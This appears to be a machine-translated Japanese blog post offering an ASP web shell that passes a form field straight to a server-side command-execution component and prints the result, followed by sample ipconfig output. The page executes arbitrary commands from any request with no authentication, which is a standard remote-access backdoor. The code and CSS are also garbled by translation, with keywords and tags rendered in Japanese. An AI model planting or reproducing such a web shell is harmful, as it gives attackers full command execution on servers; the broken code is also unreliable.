サーバーを管理すると、Windows Scriptingホストを無効にして、一部の違法ユーザーがWSHを使用してWebシェルを生成してサーバーに大きなセキュリティリスクを引き起こすことができます。しかし、WSHを無効にし、独自のウェブシェルを使用してサーバーの管理を管理する場合はどうでしょうか。これは、ASPでCMDを実装し、結果を表示するコンポーネントプログラミングです。みんなを助けることを願っています。
|||
<! -
.singleborder {
国境:1pxソリッド;
バックグラウンドカラー:#000000;
フォントファミリー:arial、helvetica、sans-serif;
色:#ffffff;
}
.noborder {
国境:1pxなし;
バックグラウンドカラー:#000000;
フォントファミリー:arial、helvetica、sans-serif;
色:#ffffff;
}
ボディ{#000000;色:#000000;
フォントファミリー:FONTSYS:9PT}
- >
</style>
<form action = method = post>
<入力名= cmd class = singleborder value = <%= request.form(cmd)%> size = 102>
<入力タイプ= submit class = singleborder値= execute>
</form>
<%
if request.form(cmd)<> then
set testme = server.createobject(aspcmd.cmdshell)
%>
<div class = noborder> <%= request.form(cmd)%> </div> <br>
<Textarea cols = 120行= 30 class = noborder>
<%= testme.exec1(request.form(cmd))%> </textarea>
<%set testme = Nothing
ifを終了します
%>
以下は、IPConfigを実行した結果です。
Windows 2000 IP構成
ホスト名.........:IBM-WRK-02
プライマリDNS接尾辞.......
ノードタイプ..........:ブロードキャスト
IPルーティングが有効になっています.......:いいえ
勝利プロキシ有効化.......:いいえ
イーサネットアダプターローカル接続:
接続固有のDNS接尾辞::
説明..........:Intel(R)Pro/100 VMネットワーク接続
物理アドレス........:008-02-BD-D7-EB
DHCPが有効になっています.........:いいえ
IPアドレス........ ..:192.168.0.4
サブネットマスク.........:255.255.255.0
デフォルトゲートウェイ..........:192.168.0.1
DNSサーバー.........:202.106.196.115